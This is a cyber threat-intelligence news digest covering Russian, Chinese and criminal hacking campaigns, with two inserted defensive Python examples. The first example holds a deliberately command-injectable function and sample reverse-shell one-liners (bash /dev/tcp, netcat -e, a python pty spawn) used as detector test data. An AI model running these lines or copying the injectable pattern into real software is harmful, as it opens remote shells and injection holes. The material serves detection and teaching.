Thursday, Feb 13, 2025 // (IG): BB // GITHUB // SN R&D
Russian Hacking Group Expands Cyber Attacks on Critical Infrastructure Across U.S., UK, and Canada
Bottom Line Up Front (BLUF): The Russian state-backed hacking group Seashell Blizzard has significantly expanded its cyber espionage operations, targeting critical infrastructure in the U.S., UK, and Canada. Microsoft warns that the group is exploiting vulnerabilities in IT management software to infiltrate sectors such as energy, telecommunications, and defense.
Analyst Comments: This escalation underscores Russia’s continued use of cyber operations as a tool for geopolitical influence. The expansion beyond Ukraine to Western infrastructure indicates a shift toward broader strategic disruption. The group’s exploitation of vulnerabilities like those in ConnectWise ScreenConnect and Fortinet FortiClient EMS demonstrates how commonly used enterprise software can become high-impact attack vectors. As geopolitical tensions persist, these operations could lay the groundwork for future disinformation campaigns, infrastructure sabotage, or espionage activities. Enterprises in critical sectors must prioritize patching vulnerabilities, segmenting networks, and adopting zero-trust frameworks to mitigate these evolving threats.
FROM THE MEDIA: Microsoft has identified Seashell Blizzard, also known as APT44 and linked to Russia's GRU military intelligence, as the perpetrator behind a growing wave of cyber intrusions since early 2024. The group's BadPilot campaign initially focused on Ukraine but has now extended into North America, Central Asia, and the Middle East. Microsoft reports that attackers have exploited vulnerabilities like CVE-2024-1709 in ConnectWise ScreenConnect and CVE-2023-48788 in Fortinet FortiClient EMS to gain persistent access to high-value networks. Their tactics include espionage, data exfiltration, and industrial control system (ICS) disruption. Key targets include arms manufacturers, energy grids, and government entities. Microsoft has advised immediate action to patch systems, monitor network activity, and enforce segmentation to mitigate potential damage.
READ THE STORY: CSO
ANALYST NOTE: The group's persistent exploitation of known vulnerabilities and advanced ICS disruption tactics poses significant risks to both public and private sector infrastructure. Recent case studies illustrate this growing threat, including operations targeting Western critical infrastructure in 2024 through software vulnerabilities impacting energy, telecommunications, and arms manufacturing sectors; supply chain attacks across Europe and Ukraine in 2023 via compromised IT service providers, enabling widespread data exfiltration; and the coordinated 2022 cyberattack against Ukraine’s power distribution infrastructure, which led to significant power outages and coincided with military actions. These cases highlight APT44's adaptive tactics and the importance of proactive defense mechanisms, international collaboration, and continuous monitoring to counter the evolving threat landscape.
Alibaba Partners with Apple to Power AI Features in China, Raising National Security Concerns
Bottom Line Up Front (BLUF): Alibaba has announced a partnership with Apple to provide AI capabilities for iPhone models sold in China. While this move helps Apple comply with local regulations, it raises potential national security concerns over data access and privacy, as a Chinese state-linked tech giant will now have a presence on millions of iPhones.
Analyst Comments: This partnership represents a significant shift in Apple's approach to the Chinese market, but it also introduces potential security risks. By integrating Alibaba’s Qwen AI model into its devices, Apple may expose user data to Chinese regulatory oversight. China’s data laws, including the Cybersecurity Law and Data Security Law, grant authorities broad access to data collected within the country. Security experts warn that this could enable state actors to monitor or intercept sensitive communications, particularly given Alibaba’s history of cooperation with Chinese authorities. The deal may also strain Apple's relationship with Western regulators, who have increasingly scrutinized Chinese tech firms for potential espionage activities.
FROM THE MEDIA: Alibaba chairman Joe Tsai revealed the partnership during a conference in Dubai, confirming that Apple chose Alibaba after exploring partnerships with several Chinese AI providers, including Baidu, Tencent, and ByteDance. The decision follows regulatory requirements mandating that AI models used in China undergo approval from government authorities. Alibaba's Qwen 2.5 model will power new AI features on iPhones sold in China, a move designed to help Apple remain competitive in a market where domestic competitors have already integrated advanced AI capabilities. However, the partnership has prompted concerns about the potential for state surveillance, given China's history of using domestic tech firms to support intelligence-gathering efforts. Alibaba’s stock has surged more than 40% since the start of the year following the announcement.
READ THE STORY: FT
ANALYST NOTE: The integration of Alibaba’s AI technology raises significant privacy and security issues. Under China’s National Intelligence Law, companies are required to assist state intelligence efforts when requested. While Apple has historically maintained strong encryption and privacy protections, the presence of Alibaba's AI infrastructure could create new attack vectors for surveillance or cyber espionage. Experts fear this could compromise not only individual privacy but also corporate and governmental communications, especially if foreign travelers’ devices interact with these systems. Western governments may respond with heightened scrutiny of Apple’s global operations, potentially impacting its market position outside China.
Google Warns of Growing Collaboration Between Cybercriminals and State-Sponsored Hackers
Bottom Line Up Front (BLUF): Google's Threat Intelligence Group has reported an increasing collaboration between cybercriminal organizations and state-sponsored hackers from Russia, China, Iran, and North Korea. This growing convergence threatens critical infrastructure globally, with healthcare, finance, and defense sectors being prime targets. Google calls for stronger regulatory frameworks and cross-border cooperation to combat the trend.
Analyst Comments: The merging of state-sponsored tactics with criminal enterprises makes the threat landscape harder to attribute and cheaper for the sponsor. By outsourcing operations to criminal groups, nation-states can obscure attribution and scale their capabilities quickly. Russia's reliance on cybercrime marketplaces is particularly notable, but similar patterns are emerging in China, Iran, and North Korea. As these alliances grow, existing defense strategies may need reevaluation to account for the dual-purpose nature of these actors: the same tooling and infrastructure can serve a ransomware affiliate one week and a state tasking the next. Enhanced public-private partnerships and legal frameworks will be essential to mitigate the risks.
FROM THE MEDIA: Google has identified a growing convergence between state-sponsored hackers and cybercriminal groups, with Russian group APT44 (Sandworm) standing out for its use of underground marketplaces to acquire malicious tools and infrastructure. Chinese and Iranian actors have similarly leveraged these services to exploit network vulnerabilities, while North Korean hackers have focused on financial gains through ransomware and cryptocurrency theft. The report also highlights the healthcare sector as a prime target, with ransomware attacks in 2024 disrupting hospital operations in the U.S., UK, and Romania. In response, Google urges governments to prioritize cybersecurity as a national security issue and implement policies that incentivize secure-by-design software development.
READ THE STORY: The Register
China’s Transnational Repression Tactics Target Global Diaspora Communities
Bottom Line Up Front (BLUF): China has significantly expanded its transnational repression efforts, using surveillance, intimidation, and coercion to silence dissent within global diaspora communities. A recent Swiss government report indicates that Beijing has pressured Tibetans and Uyghurs abroad to act as informants while employing sophisticated cyber tactics to monitor and control these groups. These activities pose long-term risks to national sovereignty and fundamental freedoms worldwide.
Analyst Comments: The growing use of transnational repression highlights the CCP's ability to project domestic control mechanisms abroad. Cyber capabilities, combined with traditional intimidation tactics, allow Beijing to suppress criticism while maintaining plausible deniability. Operations like Operation Fox Hunt, initially framed as anti-corruption, have evolved into tools for targeting political dissidents. This shift reflects a broader authoritarian trend, with other regimes likely to adopt similar tactics if left unchecked. International collaboration and updated legal frameworks are essential to safeguarding diaspora communities from foreign interference.
FROM THE MEDIA: A Swiss government report published in February 2025 revealed that China has been actively targeting Tibetan and Uyghur communities in Switzerland through transnational repression tactics. The study, conducted by the University of Basel, highlighted Beijing’s use of coercion to recruit diaspora members as informants, alongside cyberattacks aimed at monitoring activists. Officials warn that these activities undermine Swiss sovereignty and are expected to intensify as digital surveillance technologies advance. China’s Foreign Ministry rejected the report, with spokesman Guo Jiakun condemning it as "wrong information" and urging Switzerland to respect Beijing’s "core interests." The Swiss findings align with similar reports from the Netherlands and Canada, where officials have raised alarms about Chinese espionage targeting political, academic, and religious figures. International human rights organizations continue to call for coordinated action to address the growing threat of transnational repression.
READ THE STORY: The Register
Foreign Threat Actors Intensify Disinformation Campaigns Targeting U.S. Communities
Bottom Line Up Front (BLUF): State-sponsored actors from Russia, China, and Iran are ramping up efforts to manipulate public opinion and destabilize local communities across the United States. Using advanced technologies like generative AI, these campaigns target social, political, and electoral discourse at both state and local levels.
Analyst Comments: The shift from national to local influence operations indicates a tactical evolution in foreign disinformation strategies. By targeting community-level discussions, adversaries aim to erode trust in democratic institutions and sow long-term societal discord. The use of generative AI to craft realistic fake personas, images, and narratives significantly increases the reach and effectiveness of these campaigns. To counter this, federal and local authorities must collaborate to enhance public awareness and fortify information-sharing protocols across jurisdictions.
FROM THE MEDIA: These actors employ generative AI to fabricate news articles and conspiracy theories, as seen in China’s dissemination of false narratives about the Hawaii wildfires. Social media manipulation remains a primary tactic, with bots and trolls amplifying divisive content around immigration and racial tensions. In addition, foreign actors have launched fake local news sites to lend credibility to propaganda. Russian operatives have been linked to voter fraud claims during the 2024 elections, while Iranian hackers have impersonated officials to intimidate voters. Experts warn that these operations could intensify as the 2025 election cycle approaches.
READ THE STORY: GBhackers
Dutch Officials Warn of Surge in Chinese Cyber Espionage Ahead of NATO Summit
Bottom Line Up Front (BLUF): The Dutch government has warned of an expected increase in Chinese espionage activities targeting key sectors like semiconductors, aerospace, and maritime infrastructure in the lead-up to the NATO summit in The Hague in June 2025. Intelligence reports indicate that Chinese state-backed hackers have already compromised a Dutch military network and are intensifying efforts to access sensitive technology.
Analyst Comments: The anticipated espionage surge reflects China's ongoing efforts to acquire advanced technological capabilities, particularly in semiconductor manufacturing, which is crucial for its military modernization. ASML Holding NV, a global leader in lithography machines, is a prime target. The Netherlands' decision to publicly attribute these activities to China demonstrates a shift toward greater transparency and international collaboration in countering state-sponsored cyber threats. As NATO prepares to address cybersecurity challenges at its summit, this warning underscores the growing role of cyber operations in geopolitical competition.
FROM THE MEDIA: Dutch Foreign Affairs Minister Caspar Veldkamp, during a parliamentary debate, highlighted that sectors like semiconductors, aerospace, and maritime institutions face elevated espionage risks. He asserted that the government has "sufficient evidence" linking these activities to Chinese state actors. In February 2024, Dutch intelligence agencies publicly confirmed that Chinese state hackers had compromised a military network during 2023, the first time the Netherlands publicly attributed a cyber intrusion to China. Reports from 2024 further revealed that China employs both legal collaborations and illicit espionage tactics to acquire advanced technologies. The Netherlands' strategic importance, coupled with the presence of ASML, makes it a focal point for these operations.
READ THE STORY: Bloomberg
RA World Ransomware Attack in South Asia Linked to Chinese Cyber Espionage Toolset
Bottom Line Up Front (BLUF): A recent RA World ransomware attack targeting a South Asian software company has been linked to Chinese state-backed espionage tools. Symantec researchers discovered that tools previously associated with Mustang Panda were used, raising concerns about potential moonlighting within Chinese cyber operations.
Analyst Comments: The discovery of espionage tools in a financially motivated ransomware attack signals a potential shift in tactics among Chinese threat actors. Historically focused on intelligence gathering, groups like Mustang Panda may be diversifying into ransomware, possibly as individual operators seek financial gain. This blending of state-sponsored techniques with criminal objectives complicates attribution and increases risks for regional infrastructure. The potential use of the PlugX malware in both espionage and ransomware contexts also suggests an evolving and more aggressive operational strategy.
FROM THE MEDIA: The Symantec Threat Hunter Team reported that the November 2024 ransomware attack against a South Asian software company involved the use of PlugX malware, typically linked to Chinese espionage group Mustang Panda. Attackers exploited a vulnerability in Palo Alto Networks PAN-OS (CVE-2024-0012) to infiltrate the network. The toolset was previously seen in espionage campaigns against European foreign ministries and Southeast Asian government entities. Researchers suspect a lone actor within the espionage network may have pivoted to ransomware for personal profit, a behavior more commonly associated with Iranian and North Korean cyber actors.
READ THE STORY: THN // PoC: CVE-2024-0012
ANALYST NOTE: Command injection occurs when an application passes user-controlled input to an operating system shell without validating or escaping it, letting an attacker append or substitute commands that run with the application's privileges. Reverse shells invert the usual connection direction: the compromised host initiates an outbound connection to attacker-controlled infrastructure and attaches a shell to it, which sidesteps inbound firewall rules. Egress filtering and alerting on outbound connections from servers that have no business originating them are the corresponding defensive controls.
Nation-state actors, particularly from China and Russia, have been documented using these techniques for intelligence gathering and cyber operations. For example, Chinese military hackers have targeted critical infrastructure, including water utilities, ports, and energy facilities, with the strategic objective of disrupting Pacific military supply lines. Similarly, Russian state-sponsored groups such as Sandworm have infiltrated Western networks, particularly in the energy and defense sectors, and have maintained persistent access with legitimate remote monitoring and management (RMM) tools such as Atera Agent and Splashtop Remote Services, which blend in with normal administrative traffic and evade signature-based detection.
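The two techniques in the analyst note above, as an added worked example (this is not code from the original page, from Symantec, or from any of the actors discussed): a command-injection-prone wrapper beside its hardened form, and a small command-line detector for common reverse-shell launch patterns. `echo` stands in for a real tool such as `ping` or `nslookup` so the block runs offline; the sample command lines and the 203.0.113.0/24 addresses are constructed for illustration (RFC 5737 documentation range), not taken from any incident.

```python
import re
import subprocess

# Strict allowlist for a DNS hostname: labels of letters, digits and hyphens joined by dots.
# Shell metacharacters (; | & $ ` etc.) can never match this.
HOSTNAME_RE = re.compile(
    r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def run_vulnerable(host: str) -> str:
    """Vulnerable pattern: user input concatenated into a string handed to /bin/sh.

    Because shell=True, `;`, `|`, `$(...)` and friends in `host` are interpreted by the
    shell, so "example.com; id" runs `id` with the application's privileges.
    """
    cmd = f"echo resolving {host}"  # attacker controls the tail of the shell line
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout


def run_argv_only(host: str) -> str:
    """Partial fix: no shell at all. `host` becomes one literal argv element, so
    metacharacters are passed to the program as data rather than parsed."""
    proc = subprocess.run(["echo", "resolving", host], capture_output=True, text=True)
    return proc.stdout


def run_hardened(host: str) -> str:
    """Full fix: allowlist validation first, then argv without a shell (defence in depth)."""
    if not HOSTNAME_RE.match(host):
        raise ValueError(f"rejected hostname: {host!r}")
    return run_argv_only(host)


# Command-line shapes that commonly indicate a reverse shell being launched.
REVERSE_SHELL_PATTERNS = [
    re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+"),            # bash: >& /dev/tcp/IP/PORT
    re.compile(r"\b(?:nc|ncat|netcat)\b.*\s-e\s*/bin/(?:ba)?sh"),  # netcat with -e /bin/sh
    re.compile(r"\bmkfifo\b.*\b(?:nc|ncat)\b"),                     # named-pipe netcat variant
    re.compile(r"socket\.socket\(.*\.connect\(.*(?:os\.dup2|pty\.spawn)", re.S),  # python one-liner
]

# Constructed sample process command lines (documentation addresses, not real telemetry).
SAMPLE_CMDLINES = [
    "bash -i >& /dev/tcp/203.0.113.5/4444 0>&1",
    "nc -e /bin/sh 203.0.113.5 4444",
    "python3 -c 'import socket,os,pty;s=socket.socket();s.connect((\"203.0.113.5\",4444));"
    "os.dup2(s.fileno(),0);pty.spawn(\"/bin/sh\")'",
    "ssh -p 22 deploy@203.0.113.5",   # benign outbound admin session
    "nc -zv 203.0.113.5 443",         # benign port probe: no -e, no shell attached
]


def detect_reverse_shells(cmdlines):
    """Return the command lines that match any reverse-shell launch pattern."""
    return [c for c in cmdlines if any(p.search(c) for p in REVERSE_SHELL_PATTERNS)]


if __name__ == "__main__":
    payload = "example.com; echo INJECTED"
    print("vulnerable :", repr(run_vulnerable(payload)))   # second line INJECTED proves execution
    print("argv only  :", repr(run_argv_only(payload)))    # payload echoed back as literal text
    try:
        run_hardened(payload)
    except ValueError as exc:
        print("hardened   :", exc)
    for line in detect_reverse_shells(SAMPLE_CMDLINES):
        print("reverse-shell candidate:", line)
```

The detector is deliberately pattern-based and will miss obfuscated or base64-wrapped launchers; in production it belongs beside a network-side rule that flags shells and interpreters initiating outbound TCP sessions, which is the behaviour a reverse shell cannot avoid.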
Huawei’s Revenue Surges Despite Sanctions, Challenging Global Restrictions
Bottom Line Up Front (BLUF): Huawei reported a 22% revenue growth for 2024, reaching ¥860 billion ($118.25 billion), despite U.S.-led sanctions targeting its telecom and consumer technology businesses. The company attributes this growth to its strong ICT infrastructure, a recovering consumer segment, and the rapid development of its smart car solutions.
Analyst Comments: The company’s diversification into automotive solutions and domestic market reliance appears to have mitigated the impact of global restrictions. This growth could encourage further investment in indigenous tech capabilities, potentially challenging the dominance of U.S. firms in the long run. Additionally, it raises questions about the effectiveness of existing sanctions and may prompt calls for stricter enforcement or expanded measures.
FROM THE MEDIA: Huawei chairman Liang Hua announced the 22% year-over-year growth at a recent conference, emphasizing the stability of the company’s ICT division and the resurgence of its consumer segment. The company's smart car solutions business is also gaining momentum, suggesting successful diversification beyond traditional telecom sectors. This growth occurs despite the 2020 divestiture of its Honor smartphone brand and ongoing restrictions from countries like the U.S., UK, and Australia. The Shenzhen Business Daily noted that Huawei’s success contrasts with the broader struggles of China’s economy, highlighting the firm's adaptive strategies and market positioning.
READ THE STORY: MSN
Indian Army Urged to Embrace Subterranean Warfare to Counter China's Technological Edge
Bottom Line Up Front (BLUF): The Indian Army should adopt subterranean warfare tactics in mountainous and high-altitude regions to counter China's superior precision-guided munitions (PGMs), electronic, and cyber warfare capabilities. Learning from historical and contemporary examples like Hamas' tunnel strategy in Gaza can help India build cost-effective defenses against modern aerial and cyber threats.
Analyst Comments: Subterranean warfare provides a strategic advantage against technologically advanced adversaries. China's investment in underground military infrastructure and Hamas' surprising resilience in Gaza underscore the importance of such tactics. India's adoption of tunnel defenses could mitigate China's superiority in PGMs and cyber warfare while serving as a cost-efficient alternative to expensive air and missile defense systems. Moving forward, collaboration with experienced allies like Vietnam and leveraging domestic expertise from the Border Roads Organisation (BRO) will be critical.
FROM THE MEDIA: China is constructing a massive underground military command center in Beijing, reportedly 10 times larger than the Pentagon, to protect key leadership during potential conflicts. In recent conflicts, Hamas' use of tunnels helped the group survive extensive Israeli airstrikes. Drawing from these examples, retired Lt Gen H S Panag advocates for India to develop similar defenses along the Line of Actual Control (LAC) with China. Panag emphasizes that India's defenses in high-altitude areas are outdated and vulnerable to modern PGMs and electronic warfare. He estimates that fortifying defenses in Eastern Ladakh with tunnels could cost around ₹8,700 crore—far less than high-end missile defense systems.
READ THE STORY: The Print
U.S. Releases Russian Cybercriminal Alexander Vinnik in Prisoner Swap for Detained American Teacher
Bottom Line Up Front (BLUF): Alexander Vinnik, a Russian cybercriminal linked to the BTC-e cryptocurrency exchange, has been released from U.S. custody in a prisoner swap for American teacher Marc Fogel. Vinnik had been convicted of laundering billions of dollars through the exchange, which facilitated cybercrime activities, including ransomware operations and identity theft.
Analyst Comments: The release of Vinnik underscores the geopolitical complexities of cybercrime prosecutions. BTC-e was a central hub for illicit activity, processing proceeds from ransomware, hacking campaigns, and fraud on a global scale. While prisoner swaps may serve diplomatic objectives, they can also create challenges for international cybercrime enforcement, potentially emboldening other state-backed or independent actors. Vinnik’s return to Russia raises concerns about his potential involvement in future cyber operations, given Moscow’s history of leveraging cyber expertise for state-sponsored activities.
FROM THE MEDIA: Alexander Vinnik, the Russian operator of the now-defunct BTC-e exchange, was reportedly released from U.S. custody as part of a prisoner swap with Russia. In exchange, the Kremlin released Marc Fogel, a U.S. citizen detained on drug-related charges since 2021. Vinnik was initially arrested in Greece in 2017 and later extradited to the U.S., where he pleaded guilty to conspiracy to commit money laundering. The BTC-e platform, according to the U.S. Department of Justice, processed over $4 billion in illicit funds, including proceeds from ransomware attacks, identity theft, and narcotics trafficking. Vinnik was ordered to forfeit $100 million before his release. Kremlin spokesperson Dmitry Peskov confirmed the swap, though U.S. officials have yet to issue an official statement.
READ THE STORY: The Record
Samoa Attributes Cyber Attacks to China-Backed APT40, Warns of Regional Threat
Bottom Line Up Front (BLUF): Samoa’s government has publicly attributed recent cyber attacks targeting critical infrastructure to the Chinese state-sponsored hacking group APT40. This is the first time a Pacific Island nation has directly linked such activities to a Chinese government-affiliated group, raising concerns about growing cyber threats across the Blue Pacific.
Analyst Comments: APT40’s infiltration of Pacific Island networks underscores China’s persistent focus on gathering intelligence in strategically significant regions. The group’s ability to remain undetected for extended periods poses a long-term risk to government operations and critical infrastructure. Samoa’s decision to publicly identify the group may encourage other Pacific nations to follow suit, promoting greater regional cooperation in cybersecurity defense efforts. The involvement of international actors like Australia, which has increased cyber assistance in the region, indicates growing geopolitical attention to these threats.
FROM THE MEDIA: The National Computer Emergency Response Team (CERT) of Samoa has warned of "malicious cyber operations" targeting government and critical infrastructure systems across the Pacific. The attackers, identified as APT40, are known to operate under the PRC Ministry of State Security. According to the advisory, the group uses sophisticated malware and GRE tunnels to maintain persistent access and steal sensitive data. In response, Australia has deployed its Cyber RAPID team to assist Pacific nations with defensive measures. The report follows New Zealand's 2024 attribution to APT40 of a 2021 compromise of its parliamentary systems. Beijing has denied all allegations, maintaining that it does not engage in state-sponsored cyber espionage.
READ THE STORY: IB
Items of interest
Chinese Hackers Exploit Cisco Routers to Spy on Telecoms Worldwide
Bottom Line Up Front (BLUF): The Chinese state-sponsored hacking group Salt Typhoon has continued its espionage activities by exploiting vulnerabilities in Cisco routers to infiltrate global telecom networks. Recent attacks targeted at least five telecoms and multiple universities across the U.S., Asia, and Europe, with a focus on stealing sensitive communications data.
Analyst Comments: This persistent activity highlights the challenges of defending legacy network infrastructure from sophisticated state-sponsored actors. The attackers’ ability to maintain access using Cisco router vulnerabilities underscores the need for proactive patching and network monitoring. Their interest in telecom and university networks suggests a long-term strategy to gather intelligence on communications infrastructure and research advancements, potentially informing future Chinese technological capabilities.
FROM THE MEDIA: According to cybersecurity firm Recorded Future, the hacking group, which it tracks as "RedMike", exploited two Cisco IOS XE vulnerabilities to breach telecoms and universities between December 2024 and January 2025. The attackers targeted the exposed web management interfaces of more than 1,000 Cisco devices to gain privileged access and then configured GRE tunnels for persistent, covert access into victim networks. Victims include a U.S. ISP, a U.K. telecom's U.S. affiliate, and universities including UCLA and Utah Tech. Despite public exposure, sanctions, and warnings from CISA and the FBI, the espionage operations remain active, with experts suggesting the campaign is far more extensive than currently documented.
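Both the Samoa CERT advisory and the Recorded Future reporting above describe GRE tunnels configured on compromised network devices as the persistence mechanism. The following is an added example, not code from the original page or from either vendor, of the two checks a defender can run for that: flagging GRE (IP protocol 47) flows to peers that are not known tunnel endpoints, and diffing the `interface Tunnel` stanzas in a Cisco running config against a baseline. The flow records, the running config and all addresses are constructed for illustration (RFC 5737 documentation ranges); the CSV flow layout is an assumption, not any collector's native format.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed sample flow export: ts,src,dst,ip_proto,bytes. 198.51.100.0/24 are our routers.
SAMPLE_FLOWS = """\
ts,src,dst,proto,bytes
2025-01-12T03:14:07Z,198.51.100.10,203.0.113.25,47,184320
2025-01-12T03:14:09Z,198.51.100.10,198.51.100.254,6,2210
2025-01-12T03:15:11Z,198.51.100.11,192.0.2.77,47,9932
2025-01-12T03:16:02Z,198.51.100.11,203.0.113.25,47,51200
"""

MONITORED_DEVICES = {ipaddress.ip_address("198.51.100.10"), ipaddress.ip_address("198.51.100.11")}
KNOWN_GRE_PEERS = {ipaddress.ip_address("192.0.2.77")}  # the site-to-site tunnel built on purpose
GRE = 47  # IANA protocol number for GRE


def parse_flows(text):
    """Parse the constructed CSV export into dicts with typed fields."""
    rows = []
    for line in text.strip().splitlines()[1:]:  # skip header
        ts, src, dst, proto, nbytes = line.split(",")
        rows.append({"ts": ts, "src": ipaddress.ip_address(src),
                     "dst": ipaddress.ip_address(dst), "proto": int(proto), "bytes": int(nbytes)})
    return rows


def unexpected_gre_flows(rows, known_peers):
    """Any GRE flow whose far end is not an approved tunnel endpoint is suspect."""
    return [r for r in rows
            if r["proto"] == GRE and r["src"] not in known_peers and r["dst"] not in known_peers]


def summarize_by_peer(hits, devices=MONITORED_DEVICES):
    """Group suspect flows by the non-device endpoint; one peer reached from many
    devices is the shape of a collection point rather than a misconfiguration."""
    summary = defaultdict(lambda: {"devices": set(), "bytes": 0})
    for r in hits:
        device, peer = (r["src"], r["dst"]) if r["src"] in devices else (r["dst"], r["src"])
        summary[str(peer)]["devices"].add(str(device))
        summary[str(peer)]["bytes"] += r["bytes"]
    return dict(summary)


# Constructed Cisco IOS-style running config. Tunnel100 was not in the change record.
SAMPLE_RUNNING_CONFIG = """\
!
interface Tunnel0
 description site-to-site to branch
 tunnel source GigabitEthernet0/0
 tunnel destination 192.0.2.77
!
interface Tunnel100
 tunnel source GigabitEthernet0/0
 tunnel destination 203.0.113.25
!
interface GigabitEthernet0/0
 ip address 198.51.100.10 255.255.255.0
!
"""


def tunnel_interfaces(config):
    """Extract tunnel source/destination/mode per `interface TunnelN` stanza.
    Note: on IOS a tunnel with no explicit `tunnel mode` line defaults to GRE over IP."""
    tunnels, current = {}, None
    for line in config.splitlines():
        m = re.match(r"^interface (Tunnel\d+)", line)
        if m:
            current = m.group(1)
            tunnels[current] = {}
            continue
        if current is None:
            continue
        if line.startswith("!") or (line and not line.startswith(" ")):
            current = None  # stanza ended
            continue
        m = re.match(r"^\s+tunnel (source|destination|mode) (.+)$", line)
        if m:
            tunnels[current][m.group(1)] = m.group(2).strip()
    return tunnels


def unbaselined_tunnels(config, baseline):
    """Tunnel interfaces present on the box but absent from the approved baseline."""
    return {name: attrs for name, attrs in tunnel_interfaces(config).items() if name not in baseline}


if __name__ == "__main__":
    hits = unexpected_gre_flows(parse_flows(SAMPLE_FLOWS), KNOWN_GRE_PEERS)
    for peer, info in summarize_by_peer(hits).items():
        print(f"GRE to unknown peer {peer}: {len(info['devices'])} device(s), {info['bytes']} bytes")
    for name, attrs in unbaselined_tunnels(SAMPLE_RUNNING_CONFIG, {"Tunnel0"}).items():
        print(f"{name} not in baseline: {attrs}")
```

The config check only helps if the baseline is taken from change records rather than from the device itself; a device that has already been backdoored will happily report its attacker-added tunnel as normal. Pair it with the flow check, which does not trust the device at all.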
READ THE STORY: Wired // NextGov
Salt Typhoon Telecom Attack | State of Cybercrime (Video)
FROM THE MEDIA: Matt and David delve into the evolving story of Salt Typhoon, a Chinese state-sponsored group, and its use of the 'GhostSpider' backdoor to infiltrate telecommunication service providers. This sophisticated and far-reaching cyberattack, which is much larger than previously understood, has compromised sensitive cellular logs and data from government entities, telecom providers, and millions of Americans.
China's Power is Peaking. Here's Why that's Dangerous (Video)
FROM THE MEDIA: China's rise has been remarkable but is now facing significant headwinds. The economy is slowing, the population is aging, and the nation's political landscape is becoming more rigid. Historically, great powers at their peak often seek to consolidate influence, potentially through coercive actions. This dynamic makes the coming decade particularly volatile for regional and global stability.
The selected stories cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not endorse any third-party claims made in its original material or related links on its sites; the opinions expressed by third parties are theirs alone. For further questions, please contact InfoDom Securities at dominanceinformation@gmail.com.